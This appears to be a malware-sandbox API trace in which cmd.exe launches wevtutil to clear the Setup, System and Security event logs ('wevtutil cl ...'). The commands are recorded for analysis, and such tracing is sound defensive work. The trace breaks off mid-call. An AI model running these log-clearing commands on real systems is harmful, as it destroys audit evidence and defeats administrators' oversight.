SetErrorMode (uMode=0x0) returned 0x0 [0051.258] SetErrorMode (uMode=0x1) returned 0x0 [0051.258] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x434020, lpFilePart=0x3ced40 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3ced40*="system32") returned 0x13 [0051.258] SetErrorMode (uMode=0x0) returned 0x1 [0051.258] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.258] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.263] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.264] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.264] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x3ceabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ceabc) returned 0x433508 [0051.265] FindClose (in: hFindFile=0x433508 | out: hFindFile=0x433508) returned 1 [0051.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x3ceabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ceabc) returned 0xffffffff [0051.265] GetLastError () returned 0x2 [0051.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x3ceabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ceabc) returned 0x433508 [0051.265] FindClose (in: hFindFile=0x433508 | out: hFindFile=0x433508) returned 1 [0051.266] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.266] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.266] GetConsoleTitleW (in: lpConsoleTitle=0x3cefb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.266] InitializeProcThreadAttributeList (in: lpAttributeList=0x3cee3c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3cef04 | out: lpAttributeList=0x3cee3c, lpSize=0x3cef04) returned 1 [0051.266] UpdateProcThreadAttribute (in: lpAttributeList=0x3cee3c, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ceefc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3cee3c, lpPreviousValue=0x0) returned 1 [0051.266] GetStartupInfoW (in: lpStartupInfo=0x3cedf8 | out: lpStartupInfo=0x3cedf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0051.266] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0051.266] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0051.267] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0051.268] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0051.268] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0051.276] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl Setup ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3cee98*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl Setup ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ceee4 | out: lpCommandLine="wevtutil cl Setup ", lpProcessInformation=0x3ceee4*(hProcess=0x7c, hThread=0x78, dwProcessId=0x9e4, dwThreadId=0x9e8)) returned 1 [0051.291] CloseHandle (hObject=0x78) returned 1 [0051.291] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0051.291] GetEnvironmentStringsW () returned 0x434430 [0051.291] FreeEnvironmentStringsW (penv=0x434430) returned 1 [0051.291] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0051.834] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x3cedd8 | out: lpExitCode=0x3cedd8*=0x0) returned 1 [0051.834] CloseHandle (hObject=0x7c) returned 1 [0051.834] _vsnwprintf (in: _Buffer=0x3cef20, _BufferCount=0x13, _Format="%08X", _ArgList=0x3cede4 | out: _Buffer="00000000") returned 8 [0051.834] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0051.834] GetEnvironmentStringsW () returned 0x4375f8 [0051.835] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0051.835] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0051.835] GetEnvironmentStringsW () returned 0x4375f8 [0051.835] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0051.835] DeleteProcThreadAttributeList (in: lpAttributeList=0x3cee3c | out: lpAttributeList=0x3cee3c) [0051.835] GetConsoleTitleW (in: lpConsoleTitle=0x3cf1bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.836] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x435160, lpFilePart=0x3cecdc | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3cecdc*="system32") returned 0x13 [0051.836] SetErrorMode (uMode=0x0) returned 0x1 [0051.837] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.837] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.837] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.837] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x3cea58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cea58) returned 0x4341f0 [0051.838] FindClose (in: hFindFile=0x4341f0 | out: hFindFile=0x4341f0) returned 1 [0051.839] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x3cea58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cea58) returned 0xffffffff [0051.840] GetLastError () returned 0x2 [0051.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x3cea58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cea58) returned 0x4341f0 [0051.840] FindClose (in: hFindFile=0x4341f0 | out: hFindFile=0x4341f0) returned 1 [0051.841] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.841] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.841] GetConsoleTitleW (in: lpConsoleTitle=0x3cef50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.841] InitializeProcThreadAttributeList (in: lpAttributeList=0x3cedd8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ceea0 | out: lpAttributeList=0x3cedd8, lpSize=0x3ceea0) returned 1 [0051.841] UpdateProcThreadAttribute (in: lpAttributeList=0x3cedd8, dwFlags=0x0, Attribute=0x60001, lpValue=0x3cee98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3cedd8, lpPreviousValue=0x0) returned 1 [0051.841] GetStartupInfoW (in: lpStartupInfo=0x3ced94 | out: lpStartupInfo=0x3ced94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.842] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0051.843] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0051.845] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0051.846] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0051.846] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0051.846] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0051.846] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0051.846] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl System ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3cee34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl System ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3cee80 | out: lpCommandLine="wevtutil cl System ", lpProcessInformation=0x3cee80*(hProcess=0x78, hThread=0x7c, dwProcessId=0x9f0, dwThreadId=0x9f4)) returned 1 [0051.854] CloseHandle (hObject=0x7c) returned 1 [0051.854] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0051.854] GetEnvironmentStringsW () returned 0x4375f8 [0051.854] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0051.855] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0052.137] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3ced74 | out: lpExitCode=0x3ced74*=0x0) returned 1 [0052.138] CloseHandle (hObject=0x78) returned 1 [0052.138] _vsnwprintf (in: _Buffer=0x3ceebc, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ced80 | out: _Buffer="00000000") returned 8 [0052.138] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0052.138] GetEnvironmentStringsW () returned 0x4375f8 [0052.138] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.138] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0052.139] GetEnvironmentStringsW () returned 0x4375f8 [0052.139] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.139] DeleteProcThreadAttributeList (in: lpAttributeList=0x3cedd8 | out: lpAttributeList=0x3cedd8) [0052.139] GetConsoleTitleW (in: lpConsoleTitle=0x3cf158, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.140] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x432458, lpFilePart=0x3cec78 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3cec78*="system32") returned 0x13 [0052.140] SetErrorMode (uMode=0x0) returned 0x1 [0052.140] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0052.140] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0052.141] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.141] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0052.141] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x3ce9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce9f4) returned 0x434230 [0052.142] FindClose (in: hFindFile=0x434230 | out: hFindFile=0x434230) returned 1 [0052.142] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x3ce9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce9f4) returned 0xffffffff [0052.142] GetLastError () returned 0x2 [0052.142] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x3ce9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce9f4) returned 0x434230 [0052.143] FindClose (in: hFindFile=0x434230 | out: hFindFile=0x434230) returned 1 [0052.143] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0052.143] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0052.143] GetConsoleTitleW (in: lpConsoleTitle=0x3ceeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.143] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ced74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3cee3c | out: lpAttributeList=0x3ced74, lpSize=0x3cee3c) returned 1 [0052.143] UpdateProcThreadAttribute (in: lpAttributeList=0x3ced74, dwFlags=0x0, Attribute=0x60001, lpValue=0x3cee34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ced74, lpPreviousValue=0x0) returned 1 [0052.144] GetStartupInfoW (in: lpStartupInfo=0x3ced30 | out: lpStartupInfo=0x3ced30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0052.144] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0052.144] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0052.144] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0052.144] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0052.144] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.144] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0052.145] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.146] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0052.147] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0052.148] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0052.148] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0052.148] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0052.148] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0052.148] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0052.148] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0052.148] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0052.148] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl Security ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3cedd0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl Security ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3cee1c | out: lpCommandLine="wevtutil cl Security ", lpProcessInformation=0x3cee1c*(hProcess=0x7c, hThread=0x78, dwProcessId=0x9fc, dwThreadId=0xa00)) returned 1 [0052.169] CloseHandle (hObject=0x78) returned 1 [0052.169] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0052.170] GetEnvironmentStringsW () returned 0x4375f8 [0052.170] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.170] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0052.415] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x3ced10 | out: lpExitCode=0x3ced10*=0x0) returned 1 [0052.415] CloseHandle (hObject=0x7c) returned 1 [0052.415] _vsnwprintf (in: _Buffer=0x3cee58, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ced1c | out: _Buffer="00000000") returned 8 [0052.415] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0052.416] GetEnvironmentStringsW () returned 0x4375f8 [0052.416] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.416] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0052.416] GetEnvironmentStringsW () returned 0x4375f8 [0052.416] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.416] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ced74 | out: lpAttributeList=0x3ced74) [0052.416] GetConsoleTitleW (in: lpConsoleTitle=0x3cf0f4, nSize=0x104 | out: 